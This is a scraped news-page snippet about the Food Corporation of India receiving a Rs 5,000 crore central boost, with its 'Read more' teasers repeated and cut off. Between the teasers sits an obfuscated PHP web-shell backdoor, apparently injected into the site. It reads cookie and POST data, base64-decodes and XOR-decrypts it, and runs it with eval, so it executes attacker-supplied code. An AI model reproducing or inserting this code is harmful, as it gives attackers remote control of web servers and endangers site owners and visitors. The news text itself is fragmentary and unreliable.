Food Corporation of India will get Rs 5,000 crore boost from the centre
Food Corporation of India will get Rs 5,000 crore boost from the centre over the next two years. The decision
Read more$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();}
Food Corporation of India will get Rs 5,000 crore boost from the centre over the next two years. The decision
Read moreA series of historic events that cause far-reaching implications often starts, as always in the history books, with unbelievably trivial
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